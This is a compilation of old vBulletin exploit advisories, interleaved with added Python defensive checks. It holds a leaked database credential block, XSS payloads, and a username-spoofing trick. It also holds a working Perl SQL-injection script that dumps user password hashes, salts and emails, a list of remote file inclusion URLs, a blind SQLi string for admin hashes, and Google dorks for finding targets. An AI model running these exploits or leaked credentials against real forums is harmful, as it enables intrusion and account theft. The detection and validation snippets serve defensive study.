(or "database") in "search terms" or "Search Word(s):", and then see, aha, first hit:
 
##################################################################################################
 
Datenbank-Name: XXXXXXXXX
 
Datenbank-Server: localhost
 
Datenbank-Port: 3306
 
Datenbank-Benutzername: root
 
Datenbank-Kennwort: my4moo
##################################################################################################
 
 
Or in English, seen at another board:
 
##################################################################################################
Database Name: pro_aXXXXXXXXXg_com
 
Database Host: localhost
 
Database Port: 3306
 
Database Username: pro_aXXXXXXXXXg
 
Database Password: gitl0st
##################################################################################################
 
On what to do with it, I think I need not dwell.
 
How do I protect myself?
Apply the patch already posted on the official vBulletin site, or run a MySQL query:
 
##################################################################################################
DELETE FROM `vb_phrase` WHERE `varname`='database_ingo'
 
 
##################################################################################################
##################################################################################################
##################################################################################################
 
#############################################################################
Our Website : http://www.datacoders.ir
 
Special Thanks to : ccC0d3rZzz &  all iranian datacoders members
 
#############################################################################
vBulletin version 3.8.6 suffers from an information disclosure vulnerability in faq.php.
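An added example, not from the advisory and not vBulletin code: a Python check that parses a language XML in the layout quoted above (a constructed sample containing the `database_ingo` phrase), reports every phrase that interpolates `$vbulletin->config` values, and emits a parameterised form of the DELETE the advisory gives as the fix. The `vb_` table prefix and the function names are assumptions of this example.

```python
import re
import xml.etree.ElementTree as ET

# {$vbulletin->config['Section']['key']} as it appears inside phrase text.
CONFIG_REF = re.compile(r"\{\$vbulletin->config\['([^']+)'\]\['([^']+)'\]\}")

# Config keys whose disclosure through a phrase is a direct security problem.
SENSITIVE_KEYS = {"password", "username", "servername", "dbname", "port"}

# Constructed sample in the layout of install/vbulletin-language.xml: one harmless
# phrase and the database_ingo phrase quoted in the advisory.
SAMPLE_LANGUAGE_XML = """<language name="English (US)" vblangcode="en">
<phrasetype name="GLOBAL" fieldname="global">
<phrase name="welcome_x" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Welcome, {1}.]]></phrase>
<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>
</phrasetype>
</language>
"""


def find_config_leaks(language_xml):
    """Map each phrase that interpolates $vbulletin->config to the config paths it exposes."""
    root = ET.fromstring(language_xml)
    leaks = {}
    for phrase in root.iter("phrase"):
        # CDATA content arrives as plain text, newlines and <br /> included.
        refs = [f"{section}.{key}" for section, key in CONFIG_REF.findall(phrase.text or "")]
        if refs:
            leaks[phrase.get("name")] = refs
    return leaks


def sensitive_leaks(leaks):
    """Keep only phrases that expose credentials or database location details."""
    return {
        name: refs for name, refs in leaks.items()
        if any(ref.rsplit(".", 1)[1].lower() in SENSITIVE_KEYS for ref in refs)
    }


def cleanup_statements(leaks, table_prefix="vb_"):
    """Parameterised form of the DELETE the advisory recommends, one per offending phrase."""
    return [
        (f"DELETE FROM `{table_prefix}phrase` WHERE `varname` = %s", (name,))
        for name in sorted(leaks)
    ]


if __name__ == "__main__":
    found = sensitive_leaks(find_config_leaks(SAMPLE_LANGUAGE_XML))
    for name, refs in found.items():
        print(f"{name}: exposes {', '.join(refs)}")
    for sql, params in cleanup_statements(found):
        print(sql, params)
```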

MaXe/vBulletin 4.0.8 PL1 Cross Site Scripting Filter Bypass 

Code:
vBulletin - XSS Filter Bypass within Profile Customization
 
 
Versions Affected: 4.0.8 PL1 (3.8.* is not vulnerable.)
 
Info:
Content publishing, search, security, and more - vBulletin has it all.
Whether it's available features, support, or ease-of-use, vBulletin offers
the most for your money. Learn more about what makes vBulletin the
choice for people who are serious about creating thriving online communities.
 
External Links:
http://www.vbulletin.com
 
Credits: MaXe (@InterN0T)
 
 
-:: The Advisory ::-
vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the
Profile Customization feature. If this feature is not enabled the vulnerability
does not exist and the installation of vBulletin is thereby secure.
 
Within the profile customization fields, it is possible to enter colour codes,
rgb codes and even images. The image url() function does not sanitize user
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
 
With the previous patch for vBulletin 4.0.8 PL1, most attacks were disabled
however it is possible to bypass this filter and inject data which is then executed
effectively against though not limited to Internet Explorer 6.
 
Proof of Concept:
url(vbscript:msgbox("X/SS"))
 
 
-:: Solution ::-
Update vBulletin to version: 4.0.8 PL2
 
 
Disclosure Information:
- Vulnerability found and researched: 18th November 2010
- Disclosed to vendor (Internet Brands): 18th November
- Patch from Vendor available: 19th November
- Disclosed at: InterN0T, Full Disclosure, Bugtraq and Exploit: 20th November
 
 
References:
http://forum.intern0t.net/intern0t-advisories/3398-vbulletin-4-0-8-pl1-cross-site-scripting-filter-bypass-within-profile-customization.html
http://forum.intern0t.net/intern0t-advisories/3349-vbulletin-4-0-8-persistent-cross-site-scripting-via-profile-customization.html
vBulletin version 4.0.8 PL1 suffers from a cross site scripting filter bypass vulnerability.
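Added example, not the vendor's fix and not vBulletin code: a Python validator for the user-supplied `url()` value of a profile customization field, which rejects the `vbscript:` payload above together with entity- or whitespace-obfuscated variants, and admits only http(s) or relative targets. The function names and the scheme allow-list are this example's assumptions.

```python
import html
import re
import unicodedata
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# url( 'value' ), url("value") or url(value); the inner part is captured lazily
# so the final ")" is the one that closes the function.
_URL_FUNC = re.compile(r"""^url\(\s*(['"]?)(.*?)\1\s*\)$""", re.IGNORECASE | re.DOTALL)

# Characters that could close the url() or the style attribute it is emitted into.
_DANGEROUS = set("()\"'<>\\")


def _normalise(target):
    # The value ends up inside a style attribute, so browsers entity-decode it
    # first; then drop whitespace and control characters that scheme sniffing
    # ignores, so "vbs\tcript:" and "vbs&#99;ript:" collapse to the real scheme.
    decoded = html.unescape(target)
    return "".join(
        ch for ch in decoded
        if not ch.isspace() and unicodedata.category(ch)[0] != "C"
    )


def safe_css_url(value):
    """Return a cleaned url(...) if the target is http(s) or relative, otherwise None."""
    m = _URL_FUNC.match(value.strip())
    if not m:
        return None
    target = m.group(2)
    if any(ch in _DANGEROUS for ch in target):
        return None
    stripped = _normalise(target)
    scheme = urlsplit(stripped).scheme.lower()
    if scheme and scheme not in ALLOWED_SCHEMES:
        return None
    return f"url({stripped})"


if __name__ == "__main__":
    for sample in ('url(vbscript:msgbox("X/SS"))', "url(vbs&#99;ript:x)",
                   "url('http://example.org/bg.png')", "url(/images/bg.png)"):
        print(f"{sample!r:45} -> {safe_css_url(sample)!r}")
```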

Immortal Boy/vBulletin 3.8.4 / 3.8.5 Registration Bypass

Code:
===============================================================
vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
===============================================================
 
 
   010101010101010101010101010101010101010101010101010101010  
   0                                                       0
   1  Iranian Datacoders Security Team 2010                1
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
 
 
# Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
# Date: 29/08/2010                           
# Author: Immortal Boy                    
# Software Link: http://www.vbulletin.org
# Version: 3.8.4 & 3.8.5
# Google dork 1 : powered by vBulletin 3.8.4
# Google dork 2 : powered by vBulletin 3.8.5
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A
 
#  BUG :  #########################################################################
 
1 > Go to Http://[localhost]/path/register.php
 
2 > Assume that forum admin user name is ADMIN
 
3 > Type this at User Name ===> ADMIN&#00
 
4 > &#00 is an ASCII Code
 
5 > And complete the other parameters
 
6 > Then click on Complete Registration
 
7 > Now you see that your user name like admin user name
 
After this, the private messages sent to the user (ADMIN) are seen as being sent to you.
 
 
#  Patch :  #######################################################################
 
1 > Go to AdminCP
 
2 > Click on vBulletin Options and choose vBulletin Options
 
3 > Choose Censorship Options
 
4 > type &# in Censored Words section
 
5 > Then click on Save
 
#############################################################################
 
Our Website : http://www.datacoders.ir
 
Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute ,
 
hosinn , NIK , uones , mohammad_ir &  all iranian datacoders members
 
#############################################################################
vBulletin versions 3.8.4 and 3.8.5 suffer from a registration bypass vulnerability.
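An added example (not vBulletin's code, and a stricter alternative to the censored-words patch above): a Python canonicalisation that decodes character references such as `&#00`, drops invisible characters and compatibility look-alikes, and then checks a registration against existing names so that `ADMIN&#00` collides with `ADMIN`. The function names are this example's own.

```python
import html
import re
import unicodedata


def canonical_username(raw):
    """Reduce a display name to the form other users actually perceive.

    Collapses the tricks the advisory relies on: HTML character references
    (ADMIN&#00 decodes to ADMIN plus a NUL/U+FFFD), invisible control and
    format characters, compatibility look-alikes (fullwidth letters), runs of
    whitespace, and letter case.
    """
    # Decode twice so a double-encoded "&amp;#00" also collapses.
    decoded = html.unescape(html.unescape(raw))
    # NFKC folds fullwidth and ligature forms onto their ASCII equivalents.
    folded = unicodedata.normalize("NFKC", decoded)
    kept = []
    for ch in folded:
        cat = unicodedata.category(ch)
        # Drop controls (Cc), format chars (Cf), unassigned code points, and
        # the U+FFFD that html.unescape substitutes for a NUL reference.
        if cat.startswith("C") or ch == "\ufffd":
            continue
        kept.append(ch)
    return re.sub(r"\s+", " ", "".join(kept)).strip().casefold()


def registration_conflict(candidate, existing):
    """Return the existing username that `candidate` would impersonate, or None."""
    wanted = canonical_username(candidate)
    for name in existing:
        if canonical_username(name) == wanted:
            return name
    return None


if __name__ == "__main__":
    # Constructed sample: the advisory's payload against a small user table.
    users = ["alice", "ADMIN", "bob"]
    for attempt in ("ADMIN&#00", "\uff21dmin", "adm1n"):
        print(f"{attempt!r:14} -> conflicts with {registration_conflict(attempt, users)!r}")
```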

X-h4ck/vBulletin CMS 4.1.1 Recent Articles Cross Site Scripting 

Code:
============================================================
vBulletin 4 CMS Recent Articles widget XSS Vulnerability 
============================================================
 
#~ Title         : vBulletin 4 CMS Recent Articles widget XSS Vulnerability  
#~ Software      : http://www.vbulletin.com
#~ Tested on     : version 4.1.1
#~ Date          : 30/06/2011
#~ Discovered by : X-h4ck
#~ Site          : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/ 
#~ Email         : mem001@live.com 
#~ Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon
@ vBulletin 4 CMS Package..
 
~ You'll need to create a new article at The Front Page.
# Article Title : NONE
# Article Content : "><script>alert('XSS');</script> , or some other cheats : 
"><iframe SRC="http://www.pirate.al/forum/forum.php" height="100%" width="100%">
">"">><meta http-equiv="Refresh" content="0;url=http://www.pirate.al/">"">
 
Now post the article & check the Front Page (HOME) (http://localhost/vbulletin/content.php), and you will get an "xss" alert, enjoy.
Video : http://www.youtube.com/watch?v=seuT92R6j-Y
 
 
+++++++++++++++++++++++++++++++++++++++++++++
# // Aint no pussy made where we came from \\
+++++++++++++++++++++++++++++++++++++++++++++
vBulletin CMS version 4.1.1 with the Recent Articles widget suffers from a cross site scripting vulnerability.

Mr.ThieF/vBulletin 3.x vBExperience Cross Site Scripting 

Code:
[~] Author : Mr.ThieF <~
 
[~] Contact : Mr.ThieF@yahoo.com <~
 
[~] DorK : inurl:xperience.php
 
[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=171014
 
[~] Version : 3.x.x
 
[~] Exploit :
 
http://[site]/[path]/xperience.php?sortfield=xr&sortorder="><s cript>alert(1);</s cript>
 
Example : http://www.worldwide-invest.org/xperience.php?sortfield=xr&sortorder="><s cript>alert(1);</s cript>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
GreeTz : RENO <3 - x-CoD3r <3 - T3rr0risT_07 <3 -Snip3r_www - ALL My FrindS <3
vBulletin version 3.x.x with the vBExperience add-on suffers from a cross site scripting vulnerability.

d3v1l/vBulletin vBShout 6.0.5 Cross Site Scripting 

Code:
###############################################################################################################
 
 
#  Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) - Reflected Cross-Site Scripting ( XSS )
 
#  Note:  HTML Injection and Redirect works too
 
#  Script Page : http://www.dragonbyte-tech.com
 
#  Date: 24-03-2012
 
#  Author : Avram Marius Gabriel (d3v1l)
 
#  RandomStorm  - http://www.randomstorm.com
 
#  Tested on: Windows XP &amp; Vista
 
 
###############################################################################################################
 
 
#  The latest version of the vBulletin vBShout Module suffers from Cross-Site Scripting and HTML Injection.
   The issue is located in the Shoutbox Search Archive.
 
#  POC:
 
#  http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1
 
 
#  http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&s=&do=archive&instanceid=1
 
 
################################################################################################################
 
 
 
# vBShout is the ideal way to keep members on your forum while they wait for replies to their posts.
  It can be used in many ways - as a chat room for members, for staff to discuss issues in realtime,
  as a live-update feed of new posts and threads, as a way to track member milestones
 
################################################################################################################
 
-- 
Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on
Twitter<http://twitter.com/securityshell>
vBulletin vBShout module versions 6.0.5 and below suffer from a cross site scripting vulnerability.

DSecurity/EggAvatar For vBulletin 3.8.x SQL Injection 

Perl code:
#!/usr/bin/env perl
use LWP::UserAgent;

sub banner{
    print "###################################\n";
    print "############ DSecurity ############\n";
    print "###################################\n";
    print "# Email:dsecurity.vn[at]gmail.com #\n";
    print "###################################\n";
}

if(@ARGV<5){
    print "Usage: $0 address username password number_user sleeptime\n";
    print "Example: $0 http://localhost/vbb test test 10 10\n";
    exit();
}

$ua=LWP::UserAgent->new();
$ua->agent("DSecurity");
$ua->cookie_jar({});

sub login(@){
    my $username=shift;
    my $password=shift;
    my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=");
    my $res = $ua->request($req);
}

sub v_request{
    #Declare
    $print = $_[0];
    $select = $_[1];
    $from = $_[2];
    $where = $_[3];
    $limit = $_[4];
    $sleep = $ARGV[4];
    if ($from eq '') {$from = 'information_schema.tables';}
    if ($where eq '') {$where = '1';}
    if ($limit eq '') {$limit = '0';}
    if ($sleep eq '') {$sleep = '10';}

    # Create a request
    my $req = HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select  from  $from  WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1");
    # Pass request to the user agent and get a response back
    my $res = $ua->request($req);
    #print $res->content;
    if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
        {$test = $3};
    sleep($sleep);
    return $print.$test."\n";
}

&banner;
print "\n#############################################################################################################\n";
print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability                                                 #\n";
print "# Date:06-03-2011                                                                                           #\n";
print "# Author: DSecurity                                                                      #\n";
print "# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
print "# Version: 2.3.2                                                                                            #\n";
print "# Tested on: vBulletin 3.8.0                                                                                #\n";
print "#############################################################################################################\n";

#login
login($ARGV[1],$ARGV[2]);
#Foot print
print v_request('MySQL version: ','@@version');
print v_request('Data dir: ','@@datadir');
print v_request('User: ','user()');
print v_request('Database: ','database()');
#Get user
for($i=1;$i<=$ARGV[3];$i++){
    print "-----------------------------------------\n";
    print $id = v_request('ID: ','userid','user','1',$i-1);
    if($id =~ /(ID:)\s(.*)/){
        print v_request('Group: ','usergroupid','user','userid='.$2);
        print v_request('Username: ','username','user','userid='.$2);
        print v_request('Password: ','password','user','userid='.$2);
        print v_request('Salt: ','salt','user','userid='.$2);
        print v_request('Email: ','email','user','userid='.$2);
    }
}
EggAvatar for vBulletin version 3.8.x suffers from a remote SQL injection vulnerability.

indoushka/vBulletin 4.1.7 Beta 1 Remote File Inclusion

Code:
====================================================
vBulletin® Version 4.1.7 Beta 1 Multi Vulnerability 
====================================================
 
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0    .    .--.   .--.   .---.      .                  1
1  .'|        )      )      /      |                  0
0    |     --:    --:      /    .-.| .-.  .  .        1
1    |        )      )    /    (   |(   ) |  |        0
0  '---'  `--'   `--'    '      `-'`-`-'`-`--|        1
1                                            ;        0
0     Site            : 1337day.com        `-'        1
1     Support e-mail  : submit[at]inj3ct0r.com        0
0     >> Exploit database separated by exploit        1 
1           type (local, remote, DoS, etc.)           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1
 
#######################################################
 
           # Vendor: noLogging by SCRiPTZSECTOR.ORG 
 
                 # Date: 2011-07-27 
 
                # Author : indoushka 
 
            +++=[ Dz Offenders Cr3w ]=+++
 
         # KedAns-Dz * Caddy-Dz * Kalashinkov3
 
      # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz 
 
           # Contact : ind0ushka@hotmail.com
 
     # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
 
########################################################################  
 
# Exploit By indoushka 
-------------
 
Powered by vBulletin® Version 4.1.7 Beta 1
 
RFI :
Function: include    File: api.php            Line: 139
Exploit: http://localhost/vB1/api.php?api_script=[EV!L]
 
##################################################
 
Function: require_once    File: payment_gateway.php            Line: 3
Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]
 
##################################################
 
Function: include_once    File: cronadmin.php            Line: 4
Exploit: http://localhost/vB1/admincp/cronadmin.php?nextitem[filename]=[EV!L]
 
##################################################
 
Function: include    File: diagnostic.php            Line: 12
Exploit: http://localhost/vB1/admincp/diagnostic.php?match[0]=[EV!L]
 
##################################################
 
Function: require_once    File: diagnostic.php            Line: 18
Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]
 
##################################################
 
Function: include_once    File: plugin.php            Line: 22
Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]
 
##################################################
 
Function: include_once    File: class_block.php            Line: 14
Exploit: http://localhost/vB1/includes/class_block.php?file=[EV!L]
 
##################################################
 
Function: require_once    File: class_humanverify.php            Line: 2
Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L]
 
##################################################
 
Function: require_once    File: class_paid_subscription.php            Line: 24
Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L]
 
##################################################
 
Function: require_once    File: functions.php            Line: 6
Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]
 
##################################################
 
Function: include_once    File: functions_cron.php            Line: 8
Exploit: http://localhost/vB1/includes/functions_cron.php?nextitem[filename]=[EV!L]
 
##################################################
 
Function: require    File: vb.php            Line: 7
Exploit: http://localhost/vB1/vb/vb.php?filename=[EV!L]
 
##################################################
 
Function: require_once    File: class_upgrade.php            Line: 48
Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L]
 
##################################################
 
Function: include_once    File: attach.php            Line: 80
Exploit: http://localhost/vB1/packages/vbattach/attach.php?package=[EV!L]
 
##################################################
 
Function: include_once    File: attach.php            Line: 604
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]
 
##################################################
 
Function: include_once    File: attach.php            Line: 1222
Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]
 
##################################################
 
Directory Listing ckeditor :
 
http://localhost/vB1/clientscript/ckeditor/
 
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------
vBulletin version 4.1.7 Beta 1 suffers from multiple remote file inclusion vulnerabilities.

c0d3_z3r0/vBulletin vbBux/vbPlaza Blind SQL Injection

Código:
--==+======================================================================================================================+==--
--==+                  vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability                +==--
--==+======================================================================================================================+==--
 
AUTHOR: Cold z3ro & Crck_Man
SITE: www.vbPlaza.com
DORK: inurl:"vbplaza.php?do=*"
 
DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash
 
EXPLOIT: 
http://www.site.com/forum/vbplaza.ph...nk'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*
 
i.e. ASCII codes:
  58  => :
  48  => 0
  120 => x
 
NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin.
 
 
Copyrights : www.hackteach.org , www.h-t.cc
 
Greetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends
vBulletin vbBux/vbPlaza versions 2.x and below suffer from a remote blind SQL injection vulnerability in vbplaza.php.
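As an added example (not part of either advisory above), a small Python access-log scanner that flags the two request shapes this page lists: an include parameter carrying a URL or stream wrapper instead of a file name (the `[EV!L]` slots in the 4.1.7 RFI list), and a boolean-blind probe of the `and N<ascii(substring(...))` form used against vbplaza.php. The log lines, addresses and the vbplaza.php parameter name (`name`, truncated in the original) are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Request field of an Apache common/combined log line.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Boolean-blind shape from the vbPlaza advisory: and/or, then a comparison against ascii()/ord() of a substring.
BLIND_SQLI = re.compile(r"\b(and|or)\b.*?\b(ascii|ord)\s*\(\s*(substring|substr|mid)\s*\(")
# RFI shape from the 4.1.7 list: an include parameter whose value is a URL or a PHP stream wrapper.
RFI_VALUE = re.compile(r"^\s*([a-z][a-z0-9+.-]*://|php://|data:)")

def normalise(value):
    """Decode a second time (double encoding), replace inline comments used
    as whitespace, fold whitespace and case so the patterns match reliably."""
    value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).lower()

def classify(line):
    """Return [(kind, script, parameter), ...] for one log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    script = url.path.rsplit("/", 1)[-1]
    findings = []
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        value = normalise(raw)  # parse_qsl already decoded once
        if BLIND_SQLI.search(value):
            findings.append(("blind_sqli", script, key))
        if RFI_VALUE.match(value):
            findings.append(("rfi", script, key))
    return findings

def scan(lines):
    return [f for line in lines for f in classify(line)]

# Constructed sample traffic (RFC 5737 addresses); the vbplaza.php parameter
# name is assumed, the original advisory truncates it.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Apr/2012:10:00:01 +0000] "GET /forum/vbplaza.php?do=buy'
    '&name=x%27/**/and%2058%3Cascii(substring((select%201),1,1))/* HTTP/1.1" 200 512',
    '192.0.2.11 - - [07/Apr/2012:10:00:02 +0000] "GET /forum/api.php'
    '?api_script=http://203.0.113.5/x.txt HTTP/1.1" 200 88',
    '192.0.2.12 - - [07/Apr/2012:10:00:03 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 9001',
    '198.51.100.7 - - [07/Apr/2012:10:00:04 +0000] "GET /forum/payment_gateway.php'
    '?api%5Bclassname%5D=ftp%3A%2F%2F203.0.113.5%2Fshell HTTP/1.1" 200 90',
]
```

`scan(SAMPLE_LOG)` reports the vbplaza.php probe and the two include parameters fed URLs, and stays silent on the ordinary showthread.php request; comment stripping and double decoding are what keep `/**/` and `%2527`-style evasions from slipping past the patterns.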
